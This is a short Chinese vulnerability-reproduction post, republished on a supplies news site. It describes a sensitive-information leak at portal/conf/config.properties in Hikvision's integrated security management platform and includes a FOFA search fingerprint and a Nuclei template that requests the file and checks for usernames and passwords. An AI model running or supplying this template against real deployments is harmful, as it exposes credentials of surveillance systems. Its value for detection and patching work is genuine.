推广 热搜: 采购方式  甲带  滤芯  气动隔膜泵  减速机  减速机型号  履带  带式称重给煤机  无级变速机  链式给煤机 
首页 > 资讯 > 安防器材

漏洞复现|**威视综合安防管理平台信息泄露

   日期:2023-10-24 18:01:15     来源:网络整理    作者:本站编辑    浏览:57    评论:0    
免责声明
  由于传播、利用本公众号零点安全团队提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号零点安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

产品介绍

海康威视(Hikvision)是一家总部位于中国杭州的公司,是全球最大的视频监控产品供应商。除了传统的CCTV摄像机和网络摄像机,海康威视还提供各种相关的安防产品和解决方案。他们的综合安防管理平台为用户提供了一站式的解决方案,包括视频监控、入侵检测、访客管理、停车场管理等。

产品UI

漏洞说明

海康威视综合安防平台portal/conf/config.properties接口存在敏感信息泄露

指纹

app=”HIKVISION-综合安防管理平台”

Nuclei Poc

id: hikvision-information
info:  name: hikvision-information  author: xxx  severity: info  description:   metadata:    fofa-query: app="HIKVISION-综合安防管理平台"
requests:  - method: GET    path:      - "{{BaseURL}}portal/conf/config.properties"
    matchers-condition: and    matchers:      - type: word        part: body        words:          - '@bic'          - 'username'          - 'password'                          - type: status        status:          - 200

验证

 
打赏
 
更多>同类资讯
• 基层安防工作重在“防” • 乘势进击 跨越巅峰|王力安防2024
• 【器材测评】电源升级了,DC 线怎 • 保久安防召开2024年党风廉政建设
• 吴栋说跑步 |17 种可成为健身器材 • 项目经理丨中国邮电器材集团有
• 『器材测评』两代 dCS Rossini Player • 实验室器材采购投标方案-351页
• 消防器材,大火无情,警铃常响,品质 • 智能安防系统/智能家居保护你的
0相关评论

推荐图文
推荐资讯
点击排行
网站首页  |  关于我们  |  联系方式  |  使用协议  |  版权隐私  |  网站地图  |  排名推广  |  广告服务  |  积分换礼  |  网站留言  |  RSS订阅  |  违规举报  |  皖ICP备20008326号-18
Powered By DESTOON